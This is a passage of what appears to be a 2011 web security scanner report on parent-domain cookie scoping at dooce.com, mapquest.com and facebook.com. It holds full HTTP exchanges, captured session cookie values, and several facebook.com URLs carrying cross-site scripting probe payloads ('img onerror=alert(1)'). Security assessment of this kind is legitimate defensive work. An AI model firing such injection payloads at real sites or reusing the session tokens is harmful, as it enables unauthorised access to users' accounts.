pcHQiIHNyYz0iaHR0cDovL2Nvbm5lY3QuZmFjZWJvb2submV0L2VuX1VTL2FsbC5qcyN4ZmJtbD0xIj48L3NjcmlwdD5kAgMPZBYCAgEPZBYCAgIPZBYIZg9kFgRmDw8WAh4HVmlzaWJsZWhkZAIBD2QWAgIBD2QWAmYPDxYEHghDc3NDbGFzcwUKdmVydGljYWxhZB4EXyFTQgICZGQCAg9kFgICAQ9kFgQCAQ8PFgIfAAUOTmV4dCBBcnRpY2xlOiBkZAIDDxYCHgtfIUl0ZW1Db3VudAIBFgJmD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFQ2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2tpZHMtaGVhbHRoL3RvZGRsZXJzLWFuZC1zaGFyaW5nLmFzcHhkFgJmDxUBHFRlYWNoaW5nICBUb2RkbGVycyAgVG8gU2hhcmVkAgMPZBYCAgEPZBYEAgEPDxYCHwAFIFJlbGF0ZWQgQXJ0aWNsZXMgb24gS2lkcycgSGVhbHRoZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFQ2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2tpZHMtaGVhbHRoL3RvZGRsZXJzLWFuZC1zaGFyaW5nLmFzcHhkFgJmDxUBHFRlYWNoaW5nICBUb2RkbGVycyAgVG8gU2hhcmVkAgEPZBYCAgEPDxYCHwUFS2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2tpZHMtaGVhbHRoL3NsZWVwLXNvbHV0aW9ucy1mb3ItdG9kZGxlcnMuYXNweGQWAmYPFQEdU2xlZXAgU29sdXRpb25zIEZvciAgVG9kZGxlcnNkAgIPZBYCAgEPDxYCHwUFRGh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2tpZHMtaGVhbHRoL3RvZGRsZXJzLXBpY2t5LWVhdGVycy5hc3B4ZBYCZg8VAShIb3cgVG8gR2V0IFBpY2t5IEVhdGVycyBUbyBUcnkgTmV3IEZvb2RzZAIHD2QWBAIBD2QWAgICDw8WAh8BaGRkAgUPFgIfAWdkZA==" />
...[SNIP]...

9.5. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:33 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO9S9eM0ZDUxYzkzYi0zMDJmLTQwYmYtOTcwNC1mNDg4N2I4MDBiZmM1; expires=Wed, 13-Jul-2011 21:36:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=tew4lhmlby1awfarbc5plyur; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47316

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
3 Ways to Put the Wow! Back in Your Sex Life - Sexual Heal
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTMwOTUyNTA1MQ9kFgQCAQ9kFgICBA8WAh4EVGV4dAXHBw0KPG1ldGEgcHJvcGVydHk9Im9nOnRpdGxlIiBjb250ZW50PSIzIFdheXMgdG8gUHV0IHRoZSBXb3chIEJhY2sgaW4gWW91ciBTZXggTGlmZSAtIFNleHVhbCBIZWFsdGggQ2VudGVyIC0gRXZlcnlkYXkgSGVhbHRoIi8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6ZGVzY3JpcHRpb24iICBydW5hdD0ic2VydmVyIiAgaWQ9ImZiZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlRoZXJlIGFyZSBtYW55IHRyZWF0bWVudCBvcHRpb25zIGF2YWlsYWJsZSB0byBoZWxwIHNleHVhbCBhcm91c2FsIGRpc29yZGVyLiBMZWFybiBhYm91dCBzZXggdGhlcmFweSwgaG9ybW9uZSB0aGVyYXB5LCBhbmQgb3RoZXIgYW5zd2VycyBmb3IgdGhpcyBzZXggZGlzb3JkZXIuIiA+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6dHlwZSIgY29udGVudD0iYXJ0aWNsZSIgLz4NCjxtZXRhIHByb3BlcnR5PSJvZzppbWFnZSIgY29udGVudD0iaHR0cDovL2ltYWdlcy5hZ29yYW1lZGlhLmNvbS9ldmVyeWRheWhlYWx0aC9nY21zL2xvZ29fZWhfNTB4NTAuZ2lmIiAvPg0KPG1ldGEgcHJvcGVydHk9Im9nOnNpdGVfbmFtZSIgY29udGVudD0iRXZlcnlkYXlIZWFsdGguY29tIi8+DQo8bWV0YSBwcm9wZXJ0eT0iZmI6YXBwX2lkIiBjb250ZW50PSIxMzUzNDYwMzY0OTAxODYiLz4NCjxtZXRhIHByb3BlcnR5PSJmYjphZG1pbnMiIGNvbnRlbnQ9IiIgLz4NCjxtZXRhIHByb3BlcnR5PSJvZzp1cmwiIHJ1bmF0PSJzZXJ2ZXIiIGlkPSJmYnVybCIgY29udGVudD0iaHR0cDovL3d3dy5ldmVyeWRheWhlYWx0aC5jb20vc2V4dWFsLWhlYWx0aC9zZXh1YWwtZHlzZnVuY3Rpb24vYWRkaXRpb25hbC10cmVhdG1lbnRzLWZvci1mZW1hbGUtc2V4dWFsLWFyb3VzYWwtZGlzb3JkZXIuYXNweCIgLz4NCg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cDovL2Nvbm5lY3QuZmFjZWJvb2submV0L2VuX1VTL2FsbC5qcyN4ZmJtbD0xIj48L3NjcmlwdD5kAgMPZBYCAgEPZBYCAgIPZBYIZg9kFgRmDw8WAh4HVmlzaWJsZWhkZAIBD2QWAgIBD2QWAmYPDxYEHghDc3NDbGFzcwUKdmVydGljYWxhZB4EXyFTQgICZGQCAg9kFgICAQ9kFgQCAQ8PFgIfAAUOTmV4dCBBcnRpY2xlOiBkZAIDDxYCHgtfIUl0ZW1Db3VudAIBFgJmD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFYmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL3NleHVhbC1oZWFsdGgvc2V4dWFsLWR5c2Z1bmN0aW9uL2ZlbWFsZS1zZXh1YWwtYXJvdXNhbC1kaXNvcmRlci5hc3B4ZBYCZg8VATNUaGUgRmFjdHMgQWJvdXQgRmVtYWxlICBTZXh1YWwgICBBcm91c2FsICAgRGlzb3JkZXJkAgMPZBYGAgEPZBYEAgEPDxYCHwAFIVJlbGF0ZWQgQXJ0aWNsZXMgb24gU2V4dWFsIEhlYWx0aGRkAgMPFgIfBAIDFgZmD2QWAgIBDw8WAh8FBWJodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9zZXh1YWwtaGVhbHRoL3NleHVhbC1keXNmdW5jdGlvbi9mZW1hbGUtc2V4dWFsLWFyb3VzYWwtZGlzb3JkZXIuYXNweGQWAmYPFQEzVGhlIEZhY3RzIEFib3V0IEZlbWFsZSAgU2V4dWFsICAgQXJvdXNhbCAgIERpc29yZGVyZAIBD2QWAgIBDw8WAh8FBUFodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9zZXh1YWwtaGVhbHRoL3ZpYWdyYS1mb3Itd29tZW4uYXNweGQWAmYPFQERVmlhZ3JhIEZvciBXb21lbj9kAgIPZBYCAgEPDxYCHwUFUmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL3NleHVhbC1oZWFsdGgvaHlwb2FjdGl2ZS1zZXh1YWwtZGVzaXJlLWRpc29yZGVyLmFzcHhkFgJmDxUBKldoYXQgSXMgSHlwb2FjdGl2ZSBTZXh1YWwgRGVzaXJlIERpc29yZGVyP2QCAg9kFgQCAQ8PFgIfAAUTTW9yZSBvbiBNZWRpY2F0aW9uc2RkAgMPFgIfBAIDFgZmD2QWAgIBDw8WAh8FBSxodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9kcnVncy9rbG9ub3BpbmQWAmYPFQEIS2xvbm9waW5kAgEPZBYCAgEPDxYCHwUFKmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL2FtYmllbmQWAmYPFQEGQW1iaWVuZAICD2QWAgIBDw8WAh8FBSpodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9kcnVncy96b2xvZnRkFgJmDxUBBlpvbG9mdGQCAw8PFgIfAWhkFgQCAQ8PFgIfAAUfQXNrIGEgUGhhcm1hY2lzdDogU2V4dWFsIEhlYWx0aGRkAgMPFgIfBGZkAgcPZBYCAgEPZBYCAgIPDxYCHwFoZGRk" />
...[SNIP]...

10. Cookie scoped to parent domain previous next
There are 119 instances of this issue:

http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/
http://www.mapquest.com/
http://www.mapquest.com/_svc/ad/getads
http://www.mapquest.com/_svc/apixel
http://www.mapquest.com/_svc/publishing/promo
http://www.mapquest.com/_svc/searchio
http://www.mapquest.com/cdn/_uac/adpage.htm
http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg
http://www.mapquest.com/icons/stop.png
http://www.facebook.com/
http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd
http://www.facebook.com/10000082482078341583<img%20src=a%20onerror=alert(1
http://www.facebook.com/10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd
http://www.facebook.com/1242845259
http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b
http://www.facebook.com/2008/fbml
http://www.facebook.com/AOLrealestate
http://www.facebook.com/BPAmerica
http://www.facebook.com/DailyFinance
http://www.facebook.com/HockeyKen
http://www.facebook.com/KickIceForever
http://www.facebook.com/LadyBonesie
http://www.facebook.com/Loizza
http://www.facebook.com/aim
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/ajax/reg_birthday_help.php
http://www.facebook.com/ajax/register/logging.php
http://www.facebook.com/aol
http://www.facebook.com/aolradio
http://www.facebook.com/badges
http://www.facebook.com/burkerkink
http://www.facebook.com/campaign/landing.php
http://www.facebook.com/careers/
http://www.facebook.com/deedee.perez1
http://www.facebook.com/directory/pages/
http://www.facebook.com/directory/people/
http://www.facebook.com/facebook
http://www.facebook.com/fayse
http://www.facebook.com/find-friends
http://www.facebook.com/find-friends
http://www.facebook.com/gale.l.schenk
http://www.facebook.com/help/
http://www.facebook.com/help/
http://www.facebook.com/home.php
http://www.facebook.com/izaOllie
http://www.facebook.com/jezzas
http://www.facebook.com/kimberly.christ
http://www.facebook.com/ladonna.lokey
http://www.facebook.com/lakendra.roberts
http://www.facebook.com/login.php
http://www.facebook.com/login.php
http://www.facebook.com/mapquest
http://www.facebook.com/matthew.oliveira2
http://www.facebook.com/mmafighting
http://www.facebook.com/mobile
http://www.facebook.com/mobile/
http://www.facebook.com/mobile/
http://www.facebook.com/pages/Barnesville/115038011847083
http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820
http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478
http://www.facebook.com/pages/Blaine-Senior-High/106189406087059
http://www.facebook.com/pages/Editor-in-Chief/137829579583400
http://www.facebook.com/pages/Gilco-Corporation/109823499042436
http://www.facebook.com/pages/HMFIC/149403761740008
http://www.facebook.com/pages/HuffPost-World/70242384902
http://www.facebook.com/pages/Manchester-Connecticut/112527912096312
http://www.facebook.com/pages/Merchandiser/123981654314779
http://www.facebook.com/pages/New-Haven-College/130105783687523
http://www.facebook.com/pages/Northern-Illinois-University/108155335871674
http://www.facebook.com/pages/San-Antonio-Texas/110297742331680
http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707
http://www.facebook.com/pages/Sporting-News/104068362964496
http://www.facebook.com/pages/ToP-SeCNeT/195242630519520
http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161
http://www.facebook.com/pages/create.php
http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580
http://www.facebook.com/patroyo
http://www.facebook.com/people/Alexander-Bucky%20-Jordan/1242845259
http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
http://www.facebook.com/people/Bucky-Jordan%20/100000824820783
http://www.facebook.com/people/Bucky-Jordan/100000824820783
http://www.facebook.com/policy.php
http://www.facebook.com/privacy/explanation.php
http://www.facebook.com/profile.php
http://www.facebook.com/r.php
http://www.facebook.com/recover.php
http://www.facebook.com/robynalys
http://www.facebook.com/share.php
http://www.facebook.com/sharer.php
http://www.facebook.com/skdarealist
http://www.facebook.com/sportingnews
http://www.facebook.com/stefanoboscolomarchi
http://www.facebook.com/techcrunch
http://www.facebook.com/terms.php
http://www.facebook.com/theteebers
http://www.facebook.com/wmoppert
https://www.facebook.com/
https://www.facebook.com/ajax/intl/language_dialog.php
https://www.facebook.com/h02332
https://www.facebook.com/h02332
https://www.facebook.com/h02332
https://www.facebook.com/help/contact.php
https://www.facebook.com/login.php
https://www.facebook.com/pages/ToP-SeCNeT/195242630519520
https://www.facebook.com/pages/create.php
https://www.facebook.com/r.php
https://www.facebook.com/recover.php
https://www.godaddy.com/
https://www.godaddy.com/domains/search.aspx
https://www.godaddy.com/gdshop/hosting/landing.asp
https://www.godaddy.com/gdshop/registrar/search.asp
https://www.godaddy.com/gdshop/website.asp
http://www.google.com/finance
http://www.huffingtonpost.com/users/logout/
http://www.marketwatch.com/News/Story/Story.aspx
http://www.moviefone.com/
http://www.truveo.com/
http://www.truveo.com/search

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dooce.com
Path:	/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESS30952fbaf4ac11922b9cafbdf8d115e4=3978a428e0c8068b8d55294bde46612c; expires=Sat, 28-May-2011 14:29:49 GMT; path=/; domain=.dooce.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.dooce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 10:56:29 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=3978a428e0c8068b8d55294bde46612c; expires=Sat, 28-May-2011 14:29:49 GMT; path=/; domain=.dooce.com
Last-Modified: Thu, 05 May 2011 10:55:52 GMT
ETag: "7f0e32fa0924b70c7c5abdc1af28feda"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot
...[SNIP]...

10.2. http://www.mapquest.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

tsession="PpBmGmuR4mRIyqziAQ2PxT1oEdE="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
psession="B2III+t4bMnXkU9N54bv280ThuY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:03 GMT; Path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?ncid=txtlnkmqmq00000001 HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

10.3. http://www.mapquest.com/_svc/ad/getads previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/_svc/ad/getads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /_svc/ad/getads HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="
Content-Length: 732

{"request":{"pageView":"initial","userLocale":"en_US","userState":{"locations":[{"role":"mapcenter","lattitude":32.78699999999999,"longitude":-96.79900000000002}],"legs":[],"searches":[],"routeDistanc
...[SNIP]...

Response

10.4. http://www.mapquest.com/_svc/apixel previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/_svc/apixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_svc/apixel?t=jsop&i=_0&v=4&1=mq.main&2=mq%20main&3=no%20referrer&4=map%20%3A%20afarm%20%3A%20baseline&5=none&6=null&7=undefined&8=null HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

10.5. http://www.mapquest.com/_svc/publishing/promo previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/_svc/publishing/promo

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /_svc/publishing/promo HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="
Content-Length: 62

{"key":"winston-site-selector","language":"en","country":"us"}

Response

10.6. http://www.mapquest.com/_svc/searchio previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/_svc/searchio

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_svc/searchio?action=config&locale=en_US&shapepoints=(32.93119675804705,-96.97066137694627,32.64256910519762,-96.62733862305373) HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="

Response

10.7. http://www.mapquest.com/cdn/_uac/adpage.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/cdn/_uac/adpage.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdn/_uac/adpage.htm HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="

Response

10.8. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/cdn/dotcom3/images/new_purple_button.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdn/dotcom3/images/new_purple_button.jpg HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

10.9. http://www.mapquest.com/icons/stop.png previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/icons/stop.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/stop.png?text=A HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

10.10. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

